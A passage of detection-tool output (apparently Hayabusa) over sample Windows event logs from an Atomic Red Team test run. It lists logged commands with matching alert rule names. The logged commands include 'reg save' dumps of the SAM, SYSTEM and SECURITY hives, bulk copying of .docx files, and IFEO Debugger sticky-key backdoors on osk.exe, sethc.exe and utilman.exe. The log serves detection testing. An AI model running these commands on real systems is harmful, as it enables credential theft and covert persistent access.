PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.937 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.975 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.990 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.990 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.059 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.059 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.147 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.175 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.175 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.225 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.251 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.251 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.303 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.331 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.331 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.375 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.392 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.392 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.559 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.572 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.572 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.619 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.619 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.632 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.632 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.229 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.229 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.255 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.255 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.660 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.660 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.691 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.691 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:43.569 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:51.996 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:51.996 +00:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation_sysmon/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:51.996 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.048 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.048 +00:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation_sysmon/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.048 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.053 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.210 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.275 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.174 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.194 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.220 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.220 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.220 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.249 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.279 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.299 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.322 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.322 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.322 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.357 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.266 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.282 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 